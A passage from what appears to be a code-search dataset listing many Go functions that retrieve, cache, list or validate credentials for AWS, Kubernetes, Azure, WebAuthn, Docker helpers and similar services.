info,\n\t\tToken: token,\n\t}\n}", "func (p *TempCredentialsProvider) Credentials() (*aws.Credentials, error) {\n\tif time.Now().After(p.nextRefresh) {\n\t\terr := p.Refresh()\n\t\tif err != nil {\n\t\t\t// Retry next time around - don't wait for p.Duration to elapse.\n\t\t\tlog.Printf(\"TempCredentialsProvider failed to refresh credentials: %s\\n\", err)\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Schedule next refresh 5 minutes before the credentials are due to expire.\n\t\tp.nextRefresh = time.Now().Add(p.Duration - (5 * time.Minute))\n\t}\n\n\t// Transpose the temporary sts.Credentials into aws.Credentials.\n\treturn &aws.Credentials{\n\t\tAccessKeyID: *p.role.Credentials.AccessKeyID,\n\t\tSecretAccessKey: *p.role.Credentials.SecretAccessKey,\n\t\tSessionToken: *p.role.Credentials.SessionToken,\n\t}, nil\n}", "func (mock *MailgunMock) GetCredentialsCalls() []struct {\n\tLimit int\n\tSkip int\n} {\n\tvar calls []struct {\n\t\tLimit int\n\t\tSkip int\n\t}\n\tlockMailgunMockGetCredentials.RLock()\n\tcalls = mock.calls.GetCredentials\n\tlockMailgunMockGetCredentials.RUnlock()\n\treturn calls\n}", "func GetCredentialsSecret(coreClient client.Client, namespace string, secretName string) (*Creds, error) {\n\tvar credentialsSecret apicorev1.Secret\n\tkey := client.ObjectKey{Namespace: namespace, Name: secretName}\n\n\tif err := coreClient.Get(context.Background(), key, &credentialsSecret); err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\treturn nil, fmt.Errorf(\n\t\t\t\t\"error credentials secret %s not found in namespace %s: %w\", secretName, namespace, err)\n\t\t}\n\t\treturn nil, fmt.Errorf(\n\t\t\t\"error getting credentials secret %s in namespace %s: %w\", secretName, namespace, err)\n\t}\n\n\to := Creds{}\n\to.URL = string(credentialsSecret.Data[UrlField])\n\to.Username = string(credentialsSecret.Data[UsernameField])\n\to.Password = string(credentialsSecret.Data[PasswordField])\n\to.CAFile = string(credentialsSecret.Data[CafileField])\n\tinsecure, err := strconv.ParseBool(string(credentialsSecret.Data[InsecureField]))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to identify %s in credentials %w\", InsecureField, err)\n\t}\n\to.Insecure = insecure\n\to.CABundle = string(credentialsSecret.Data[CaBundleField])\n\n\t// write CA bundle to a file if exist.\n\t// its best if we could mount the secret into a file,\n\t// but this controller deployment cannot\n\tif o.CABundle != \"\" {\n\t\tcaFilePath, err := writeCA(strings.NewReader(o.CABundle))\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"failed to extract and store the CA %s\", err)\n\t\t\treturn nil, err\n\t\t}\n\t\to.CAFile = caFilePath\n\t}\n\treturn &o, nil\n}", "func (c *WebAuthn) GetCredentialsWithParams(v *WebAuthnGetCredentialsParams) ([]*WebAuthnCredential, error) {\n\tresp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: \"WebAuthn.getCredentials\", Params: v})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar chromeData struct {\n\t\tResult struct {\n\t\t\tCredentials []*WebAuthnCredential\n\t\t}\n\t}\n\n\tif resp == nil {\n\t\treturn nil, &gcdmessage.ChromeEmptyResponseErr{}\n\t}\n\n\t// test if error first\n\tcerr := &gcdmessage.ChromeErrorResponse{}\n\tjson.Unmarshal(resp.Data, cerr)\n\tif cerr != nil && cerr.Error != nil {\n\t\treturn nil, &gcdmessage.ChromeRequestErr{Resp: cerr}\n\t}\n\n\tif err := json.Unmarshal(resp.Data, &chromeData); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn chromeData.Result.Credentials, nil\n}", "func (source *AWSSecretsManagerSource) Credentials() ([]Credentials, error) {\n\tclient := source.getClient()\n\n\tsecretIDs := []string{}\n\n\tif source.SecretPrefix != \"\" {\n\t\tif err := client.ListSecretsPages(&secretsmanager.ListSecretsInput{}, func(output *secretsmanager.ListSecretsOutput, lastPage bool) bool {\n\t\t\tfor _, secret := range output.SecretList {\n\t\t\t\tif strings.HasPrefix(*secret.Name, source.SecretPrefix) {\n\t\t\t\t\tsecretIDs = append(secretIDs, *secret.ARN)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn !lastPage\n\t\t}); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error listing secrets: %v\", err)\n\t\t}\n\n\t\tif len(secretIDs) == 0 {\n\t\t\treturn nil, fmt.Errorf(\"No secrets found with the '%s' prefix\", source.SecretPrefix)\n\t\t}\n\t} else if source.SecretID != \"\" {\n\t\tsecretIDs = append(secretIDs, source.SecretID)\n\t}\n\n\tcredentials := []Credentials{}\n\tfor _, secretID := range secretIDs {\n\t\tvalue, err := client.GetSecretValue(&secretsmanager.GetSecretValueInput{\n\t\t\tSecretId: aws.String(secretID),\n\t\t})\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while fetching secret %s: %v\", secretID, err)\n\t\t}\n\t\tfetchedCredentials, err := getCredentialsFromBytes([]byte(*value.SecretString))\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while parsing credentials from secret %s: %v\", secretID, err)\n\t\t}\n\t\tcredentials = append(credentials, fetchedCredentials...)\n\t}\n\n\treturn credentials, nil\n}", "func (p DirectHandler) getCredentials(w http.ResponseWriter, r *http.Request) (credentials, error) {\n\n\t// GET /something?user=name&passwd=xyz&aud=bar\n\tif r.Method == \"GET\" {\n\t\treturn credentials{\n\t\t\tUser: r.URL.Query().Get(\"user\"),\n\t\t\tPassword: r.URL.Query().Get(\"passwd\"),\n\t\t\tAudience: r.URL.Query().Get(\"aud\"),\n\t\t}, nil\n\t}\n\n\tif r.Method != \"POST\" {\n\t\treturn credentials{}, fmt.Errorf(\"method %s not supported\", r.Method)\n\t}\n\n\tif r.Body != nil {\n\t\tr.Body = http.MaxBytesReader(w, r.Body, MaxHTTPBodySize)\n\t}\n\tcontentType := r.Header.Get(\"Content-Type\")\n\tif contentType != \"\" {\n\t\tmt, _, err := mime.ParseMediaType(r.Header.Get(\"Content-Type\"))\n\t\tif err != nil {\n\t\t\treturn credentials{}, err\n\t\t}\n\t\tcontentType = mt\n\t}\n\n\t// POST with json body\n\tif contentType == \"application/json\" {\n\t\tvar creds credentials\n\t\tif err := json.NewDecoder(r.Body).Decode(&creds); err != nil {\n\t\t\treturn credentials{}, fmt.Errorf(\"failed to parse request body: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\t// POST with form\n\tif err := r.ParseForm(); err != nil {\n\t\treturn credentials{}, fmt.Errorf(\"failed to parse request: %w\", err)\n\t}\n\n\treturn credentials{\n\t\tUser: r.Form.Get(\"user\"),\n\t\tPassword: r.Form.Get(\"passwd\"),\n\t\tAudience: r.Form.Get(\"aud\"),\n\t}, nil\n}", "func (c *Client) ListMyCredentials() ([]*api.Credential, error) {\n\tvar out []*api.Credential\n\trawURL := fmt.Sprintf(pathCredentials, c.base.String())\n\terr := c.get(rawURL, true, &out)\n\treturn out, errio.Error(err)\n}", "func Credentials(ctx context.Context, scopes ...string) *google.Credentials {\n\treturn CredentialsEnv(ctx, envPrivateKey, scopes...)\n}", "func (t *Application) cliCredentials() (*credentials.Credentials, error) {\n\tif *t.Token != \"\" && *t.Hub == \"\" {\n\t\treturn nil, trace.BadParameter(\"--hub flag must be provided if --token flag is provided\")\n\t}\n\tif *t.Hub != \"\" {\n\t\treturn credentials.FromTokenAndHub(*t.Token, *t.Hub), nil\n\t}\n\treturn nil, trace.NotFound(\"no CLI credentials provided\")\n}", "func (m *Application) GetPasswordCredentials()([]PasswordCredentialable) {\n return m.passwordCredentials\n}", "func (s serverConfigV14) GetCredential() credential {\n\tserverConfigMu.RLock()\n\tdefer serverConfigMu.RUnlock()\n\n\treturn s.Credential\n}", "func (ec *ExtensionClient) ListCredentials(extensionID, serviceID string) (res []*extension.ExtensionCredentials, err error) {\n\trequest, err := extensionc.BuildListCredentialsPayload(extensionID, serviceID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse, err := ec.c.ListCredentials()(context.Background(), request)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn response.([]*extension.ExtensionCredentials), nil\n}", "func (p *PorterHelper) Get(serverURL string) (user string, secret string, err error) {\n\treturn p.AuthGetter.GetCredentials(serverURL)\n}", "func (client IdentityClient) ListDbCredentials(ctx context.Context, request ListDbCredentialsRequest) (response ListDbCredentialsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listDbCredentials, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListDbCredentialsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListDbCredentialsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListDbCredentialsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListDbCredentialsResponse\")\n\t}\n\treturn\n}", "func (CcsAwsSession *ccsAwsSession) GetCredentials() (*credentials.Value, error) {\n\tif err := CcsAwsSession.GetAWSSessions(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create aws session to retrieve credentials: %v\", err)\n\t}\n\n\tcreds, err := CcsAwsSession.session.Config.Credentials.Get()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get aws credentials: %v\", err)\n\t}\n\treturn &creds, nil\n}", "func (w *Registration) Credentials() (Credentials, error) {\n\tw.mutex.Lock()\n\tcred := w.curCredentials\n\tw.mutex.Unlock()\n\tif cred == nil {\n\t\treturn Credentials{}, errors.New(\"Not ready\")\n\t}\n\treturn *cred, nil\n}", "func (c *Client) Credentials() string {\n\ts0 := hex.EncodeToString(c.i)\n\ts1 := hex.EncodeToString(c.A.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (auth *KeySecretAuth) GetCreds() []string {\n\tcreds := []string{auth.apiKey, auth.apiSecret}\n\treturn creds\n}", "func GetCredentialsServer() CredentialsServer {\n\tcs, ok := AllCredentialsServers[dbCredentialsServer]\n\tif !ok {\n\t\tlog.Exitf(\"Invalid credential server: %v\", dbCredentialsServer)\n\t}\n\treturn cs\n}", "func (doWebAuthn WebAuthn) GetCredential(authenticatorID webauthn.AuthenticatorID, credentialID string) (retCredential *webauthn.Credential, err error) {\n\tb := webauthn.GetCredential(authenticatorID, credentialID)\n\treturn b.Do(doWebAuthn.ctxWithExecutor)\n}", "func (p *CredentialsCache) Retrieve(ctx context.Context) (Credentials, error) {\n\tif creds := p.getCreds(); creds != nil {\n\t\treturn *creds, nil\n\t}\n\n\tresCh := p.sf.DoChan(\"\", func() (interface{}, error) {\n\t\treturn p.singleRetrieve(&suppressedContext{ctx})\n\t})\n\tselect {\n\tcase res := <-resCh:\n\t\treturn res.Val.(Credentials), res.Err\n\tcase <-ctx.Done():\n\t\treturn Credentials{}, &RequestCanceledError{Err: ctx.Err()}\n\t}\n}", "func (auth *JWTAuth) GetCreds() []string {\n\tcreds := []string{auth.JWT}\n\treturn creds\n}", "func (t *AuthorizationTransport) GetCredential() (string, string, string) {\n\tt.rwLocker.RLock()\n\tdefer t.rwLocker.RUnlock()\n\treturn t.SecretID, t.SecretKey, t.SessionToken\n}", "func (proxy *StandAloneProxyConfig) GetManagementServerCredentials(mgmtURL url.URL) (common.Credentials, error) {\n\tif mgmtServer, ok := proxy.managementServers[mgmtURL]; ok {\n\t\treturn mgmtServer.Credentials, nil\n\t}\n\treturn common.Credentials{}, fmt.Errorf(\"url not configured\")\n}", "func (o LookupAppResultOutput) Credentials() GoogleCloudApigeeV1CredentialResponseArrayOutput {\n\treturn o.ApplyT(func(v LookupAppResult) []GoogleCloudApigeeV1CredentialResponse { return v.Credentials }).(GoogleCloudApigeeV1CredentialResponseArrayOutput)\n}", "func (client GroupClient) GetCredential(accountName string, databaseName string, credentialName string) (result USQLCredential, err error) {\n\treq, err := client.GetCredentialPreparer(accountName, databaseName, credentialName)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"GetCredential\", nil, \"Failure preparing request\")\n\t\treturn\n\t}\n\n\tresp, err := client.GetCredentialSender(req)\n\tif err != nil {\n\t\tresult.Response = autorest.Response{Response: resp}\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"GetCredential\", resp, \"Failure sending request\")\n\t\treturn\n\t}\n\n\tresult, err = client.GetCredentialResponder(resp)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"GetCredential\", resp, \"Failure responding to request\")\n\t}\n\n\treturn\n}", "func (m *Application) GetKeyCredentials()([]KeyCredentialable) {\n return m.keyCredentials\n}", "func (c *stsCredentialsCache) getStsCredentials(accessor Accessor) (*credentials.Credentials, error) {\n\tif !c.expired() && c.credentials != nil {\n\t\treturn c.credentials, nil\n\t}\n\n\tperRPCCreds, err := accessor.Credentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient, err := newConn(accessor.IdentityProvider(), config.Env.Token, perRPCCreds)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer client.Close()\n\n\tbundle, err := client.refreshStsCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tstsToken := bundle.GetStsToken()\n\n\tawsCredentials := credentials.NewStaticCredentialsFromCreds(credentials.Value{\n\t\tAccessKeyID: stsToken.AccessKeyId,\n\t\tSecretAccessKey: stsToken.SecretAccessKey,\n\t\tSessionToken: stsToken.SessionToken,\n\t})\n\n\tc.add(stsToken.GetExpiration(), awsCredentials)\n\n\treturn awsCredentials, nil\n}", "func (a *Client) GetClusterCredentials(params *GetClusterCredentialsParams, authInfo runtime.ClientAuthInfoWriter) (*GetClusterCredentialsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetClusterCredentialsParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"GetClusterCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/clusters/{name}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &GetClusterCredentialsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetClusterCredentialsOK), nil\n\n}", "func getAWSCredentials(keychainName string, keychainProfile string) (*credentials.Credentials, error) {\n\n\t// Open the keyring which holds the credentials\n\tring, _ := keyring.Open(keyring.Config{\n\t\tServiceName: \"aws-vault\",\n\t\tAllowedBackends: []keyring.BackendType{keyring.KeychainBackend},\n\t\tKeychainName: keychainName,\n\t\tKeychainTrustApplication: true,\n\t})\n\n\t// Prepare options for the vault before creating the provider\n\tvConfig, err := vault.LoadConfigFromEnv()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to load AWS config from environment\")\n\t}\n\tvOptions := vault.VaultOptions{\n\t\tConfig: vConfig,\n\t\tMfaPrompt: prompt.Method(\"terminal\"),\n\t}\n\tvOptions = vOptions.ApplyDefaults()\n\terr = vOptions.Validate()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to validate aws-vault options\")\n\t}\n\n\t// Get a new provider to retrieve the credentials\n\tprovider, err := vault.NewVaultProvider(ring, keychainProfile, vOptions)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to create aws-vault provider\")\n\t}\n\tcredVals, err := provider.Retrieve()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to retrieve aws credentials from aws-vault\")\n\t}\n\treturn credentials.NewStaticCredentialsFromCreds(credVals), nil\n}", "func (s *Synthetics) GetSecureCredentials() ([]*SecureCredential, error) {\n\treturn s.GetSecureCredentialsWithContext(context.Background())\n}", "func (c *ClusterClient) Credentials() *CredentialsClient {\n\treturn NewCredentialsClient(\n\t\tc.transport,\n\t\tpath.Join(c.path, \"credentials\"),\n\t)\n}", "func (dao *DefaultUserCredentialsDAO) GetUserCredential(username string) (userCredential UserCredential, err error) {\n\terr = dao.db.Where(\"username = ?\", username).First(&userCredential).Error\n\treturn\n}", "func (svc *credentialService) Get(ctx context.Context, email string) (model.Credential, error) {\n\tcred, err := svc.repo.Get(ctx, email)\n\tif err == repo.ErrNotFound {\n\t\t//user not found, cannot login\n\t\treturn cred, service.ErrNotFound\n\t}\n\n\treturn cred, err\n}", "func (s Strategy) GetCredential(a string, t string) (Credential, error) {\n\tvar cred Credential\n\tvar err error\n\n\tcreda := s.Credentials\n\n\tif creda.Database.GetAdapter() == a && creda.Database.GetType() == t {\n\t\treturn creda.Database, err\n\t}\n\n\tif creda.Service.GetAdapter() == a && creda.Service.GetType() == t {\n\t\treturn creda.Service, err\n\t}\n\n\terr = fmt.Errorf(\"Credential %s not found.\", a)\n\tlog.Error(uuid, \"strategy.getCredentials\", err, \"Getting credential %s for strategy.\", a)\n\n\treturn cred, err\n}", "func GetUserCredential(username string) (*views.Credentials,error){\n\tresult := db.QueryRow(\"SELECT password FROM avelival WHERE username= $1\", username)\n\t// We create another instance of `Credentials` to store the credentials we get from the database\n\thashedCreds := &views.Credentials{}\n\n\t// Store the obtained password in `storedCreds`\n\terr := result.Scan(&hashedCreds.Password)\n\tif err != nil {\n\t\treturn nil,err\n\t}\n\t\n\treturn hashedCreds,nil\n}", "func setCredentials() *credentials.Credentials {\n\t// First, try the credentials file set by AWS CLI tool.\n\t// Note the empty string instructs to look under default file path (different based on OS).\n\t// This file can have multiple profiles and a default profile will be used unless otherwise configured.\n\t// See: https://godoc.org/github.com/aws/aws-sdk-go/aws/credentials#SharedCredentialsProvider\n\tcreds := credentials.NewSharedCredentials(\"\", cfg.AWS.Profile)\n\n\t// Second, use environment variables if set. The following are checked:\n\t// Access Key ID: AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY\n\t// Secret Access Key: AWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY\n\tenvCreds := credentials.NewEnvCredentials()\n\tsetCreds, _ := envCreds.Get()\n\t// error apparently does not return if environment variables weren't set\n\t// so check what was set and look for empty strings, don't want to set empty creds\n\tif setCreds.AccessKeyID != \"\" && setCreds.SecretAccessKey != \"\" {\n\t\tcreds = envCreds\n\t}\n\n\t// Last, if credentials were passed via CLI, always prefer those\n\tif cfg.AWS.AccessKeyID != \"\" && cfg.AWS.SecretAccessKey != \"\" {\n\t\tcreds = credentials.NewStaticCredentials(cfg.AWS.AccessKeyID, cfg.AWS.SecretAccessKey, \"\")\n\t}\n\n\treturn creds\n}", "func GetPluginCreds(username string, password string, brokerIp string, brokerPort, timeout int, pluginType string, logLevel string) (*catalogue.ManagerCredentials, error) {\n\tregisterMessage := catalogue.PluginRegisterMessage{}\n\tregisterMessage.Action = \"register\"\n\tregisterMessage.Type = pluginType\n\treturn getCreds(username, password, brokerIp, brokerPort, timeout, registerMessage, logLevel)\n}", "func (s *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(s.salt)\n\ts1 := hex.EncodeToString(s.xB.Bytes())\n\treturn s0 + \":\" + s1\n}", "func (c *WebAuthn) GetCredential(authenticatorId string, credentialId string) (*WebAuthnCredential, error) {\n\tvar v WebAuthnGetCredentialParams\n\tv.AuthenticatorId = authenticatorId\n\tv.CredentialId = credentialId\n\treturn c.GetCredentialWithParams(&v)\n}", "func (RequestAuthenticationToken *TRequestAuthenticationToken) GetCredential() string {\n\treturn \"\"\n}", "func (in *Credentials) DeepCopy() *Credentials {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Credentials)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (endpoint *CredentialEndpoint) List(ctx context.Context, domain string) ([]Credential, error) {\n\trequest := endpoint.inner().Request(ctx, &credentialListResponse{}).\n\t\tSetPathParameter(\"domain\", domain)\n\tif response, error := request.Get(credentialsListPath); error != nil {\n\t\treturn nil, error\n\t} else {\n\t\treturn response.(*credentialListResponse).Credentials, nil\n\t}\n}", "func (client GroupClient) ListCredentials(accountName string, databaseName string, filter string, top *int32, skip *int32, expand string, selectParameter string, orderby string, count *bool) (result USQLCredentialList, err error) {\n\treq, err := client.ListCredentialsPreparer(accountName, databaseName, filter, top, skip, expand, selectParameter, orderby, count)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"ListCredentials\", nil, \"Failure preparing request\")\n\t\treturn\n\t}\n\n\tresp, err := client.ListCredentialsSender(req)\n\tif err != nil {\n\t\tresult.Response = autorest.Response{Response: resp}\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"ListCredentials\", resp, \"Failure sending request\")\n\t\treturn\n\t}\n\n\tresult, err = client.ListCredentialsResponder(resp)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"catalog.GroupClient\", \"ListCredentials\", resp, \"Failure responding to request\")\n\t}\n\n\treturn\n}", "func GetCredentialsFile() (*CredentialsFile, error) {\n\thome := func() string {\n\t\tif runtime.GOOS == \"windows\" {\n\t\t\treturn os.Getenv(\"USERPROFILE\")\n\t\t}\n\t\treturn os.Getenv(\"HOME\")\n\t}\n\tpath := filepath.Join(home(), \".aws\", \"credentials\")\n\tif p := os.Getenv(\"AWS_SHARED_CREDENTIALS_FILE\"); len(p) > 0 {\n\t\tpath = p\n\t}\n\tini.DefaultHeader = true\n\tf, err := ini.InsensitiveLoad(path)\n\treturn &CredentialsFile{f, path}, err\n}", "func NewCredentials() *Credentials {\n\t// TODO savefile\n\treturn &Credentials{users: map[string]string{}}\n}", "func (m Manager) ValidateCredentials(username string, password string) (*common.User, error) {\n\tvar errStrings []string\n\tvar u *common.User\n\tvar err error\n\tstart := time.Now()\n\tif len(m.AuthenticationClients) == 0 {\n\t\treturn nil, errors.New(\"no authentication providers enabled\")\n\t}\n\n\tfor _, c := range m.AuthenticationClients {\n\t\tu, err = c.ValidateCredentials(username, password)\n\t\tif err != nil {\n\t\t\terrStrings = append(errStrings, fmt.Sprintf(\"%v: %v\", c.GetOrigin(), err))\n\t\t}\n\t}\n\n\te2 := time.Since(start)\n\tglog.V(2).Infof(\"Validated credentials in %s\", e2)\n\n\tif u == nil {\n\t\treturn nil, fmt.Errorf(strings.Join(errStrings, \"\\n\"))\n\t}\n\n\treturn u, nil\n}", "func (p *TempCredentialsProvider) getCredsWithRole() (credentials.Value, error) {\n\tlog.Println(\"Getting credentials with AssumeRole\")\n\n\tif p.config.RoleARN == \"\" {\n\t\treturn credentials.Value{}, errors.New(\"No role defined\")\n\t}\n\n\trole, err := p.assumeRoleFromCreds(p.masterCreds, true)\n\tif err != nil {\n\t\treturn credentials.Value{}, err\n\t}\n\n\tp.SetExpiration(*role.Expiration, DefaultExpirationWindow)\n\n\tlog.Printf(\"Using role %s, expires in %s\", formatKeyForDisplay(*role.AccessKeyId), time.Until(*role.Expiration).String())\n\treturn credentials.Value{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t}, nil\n}", "func NewCredentials(service string) tushle.Credentials {\n\treturn &creds{\n\t\tservice: service,\n\t}\n}", "func (c *Client) Credentials() string {\n\tvar b bytes.Buffer\n\n\tb.WriteString(hex.EncodeToString(c.i))\n\tb.WriteByte(':')\n\tb.WriteString(hex.EncodeToString(c.xA.Bytes()))\n\treturn b.String()\n}", "func (om *Sdk) GetDirectorCredentials(credential string) (*SimpleCredential, error) {\n\treturn om.getCredential(fmt.Sprintf(\"api/v0/deployed/director/credentials/%s\", credential))\n}", "func Get(helper Helper, reader io.Reader, writer io.Writer) error {\n\tscanner := bufio.NewScanner(reader)\n\n\tbuffer := new(bytes.Buffer)\n\tfor scanner.Scan() {\n\t\tbuffer.Write(scanner.Bytes())\n\t}\n\n\tif err := scanner.Err(); err != nil && err != io.EOF {\n\t\treturn err\n\t}\n\n\tserverURL := strings.TrimSpace(buffer.String())\n\tif len(serverURL) == 0 {\n\t\treturn NewErrCredentialsMissingServerURL()\n\t}\n\n\tusername, secret, err := helper.Get(serverURL)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuffer.Reset()\n\terr = json.NewEncoder(buffer).Encode(Credentials{\n\t\tServerURL: serverURL,\n\t\tUsername: username,\n\t\tSecret: secret,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, _ = fmt.Fprint(writer, buffer.String())\n\treturn nil\n}", "func NewGetCredentialsResponseCredential() *GetCredentialsResponseCredential {\n\tthis := GetCredentialsResponseCredential{}\n\treturn &this\n}", "func (p *SSOCredentialProvider) Retrieve() (credentials.Value, error) {\n\tin := &sso.GetRoleCredentialsInput{\n\t\tAccountId: &p.AccountID,\n\t\tRoleName: &p.RoleName,\n\t\tAccessToken: &p.Cache.AccessToken,\n\t}\n\tsvc := sso.New(p.Session)\n\tout, err := svc.GetRoleCredentials(in)\n\tif err != nil {\n\t\treturn credentials.Value{}, err\n\t}\n\treturn credentials.Value{\n\t\tProviderName: \"SSOCredentialProvider\",\n\t\tAccessKeyID: *out.RoleCredentials.AccessKeyId,\n\t\tSecretAccessKey: *out.RoleCredentials.SecretAccessKey,\n\t\tSessionToken: *out.RoleCredentials.SessionToken,\n\t}, nil\n}", "func Credentials() (string, string) {\n\tqs := []*survey.Question{\n\t\t{\n\t\t\tName: \"username\",\n\t\t\tPrompt: &survey.Input{Message: \"What is your username?\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t\t{\n\t\t\tName: \"password\",\n\t\t\tPrompt: &survey.Password{Message: \"Please enter your password.\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t}\n\n\tanswers := struct {\n\t\tUsername string\n\t\tPassword string\n\t}{}\n\n\terr := survey.Ask(qs, &answers)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn answers.Username, answers.Password\n}", "func (s *SendPaymentFormRequest) GetCredentials() (value InputCredentialsClass) {\n\tif s == nil {\n\t\treturn\n\t}\n\treturn s.Credentials\n}", "func getOauthToken() (*gceCredential, error) {\n\t_, err := user.Current()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tconfPath := path.Join(*credentialsDir, \".config/gcloud/credentials\")\n\tf, err := os.Open(confPath)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to load gcloud credentials: %q\", confPath)\n\t}\n\tdefer f.Close()\n\tcache := &gcloudCredentialsCache{}\n\tif err := json.NewDecoder(f).Decode(cache); err != nil {\n\t\treturn nil, err\n\t}\n\tif len(cache.Data) == 0 {\n\t\treturn nil, fmt.Errorf(\"no gcloud credentials cached in: %q\", confPath)\n\t}\n\treturn &cache.Data[0].Credential, nil\n}", "func (g *Git) GetRemoteCredentials(c *cli.Context) (string, string, string, error) {\n\tif c.GlobalString(\"token\") == \"\" {\n\t\treturn \"\", \"\", \"\", errors.New(\"Flag `--token` not set.\\nPlease provide a personal access token via flag `--token` or environment variable `GCHL_GITHUB_TOKEN`\")\n\t}\n\n\tif remote := c.GlobalString(\"remote\"); remote != \"\" {\n\t\tuser, repo, err := parseRemoteString(remote)\n\t\treturn user, repo, c.GlobalString(\"token\"), err\n\t}\n\n\tremotes, err := g.repo.Remotes()\n\tif err != nil {\n\t\treturn \"\", \"\", \"\", err\n\t}\n\n\tif len(remotes) == 0 {\n\t\treturn \"\", \"\", \"\", errors.New(\"No `--remote` flag provided and current repository does not have a remote origin\")\n\t}\n\n\tremote := remotes[0].Config().URLs[0]\n\tuser, repo, err := parseRemoteString(remote)\n\treturn user, repo, c.GlobalString(\"token\"), err\n}", "func (p *AssumeRoleProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\trole, err := p.RetrieveStsCredentials(ctx)\n\tif err != nil {\n\t\treturn aws.Credentials{}, err\n\t}\n\n\treturn aws.Credentials{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t\tCanExpire: true,\n\t\tExpires: *role.Expiration,\n\t}, nil\n}", "func (c *Server) Credentials() string {\n\n\ts0 := hex.EncodeToString(c.s)\n\ts1 := hex.EncodeToString(c.B.Bytes())\n\treturn s0 + \":\" + s1\n}", "func getCredentials(env storageEnvironment) (map[string]string, error) {\n\tcredentials := map[string]string{}\n\tswitch env {\n\tcase emulator:\n\t\treturn map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": storage.StorageEmulatorAccountName,\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": storage.StorageEmulatorAccountKey}, nil\n\tcase account:\n\t\tcredentials = map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_NAME\"),\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_KEY\")}\n\t\tif err := checkEnvVar(&credentials); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn 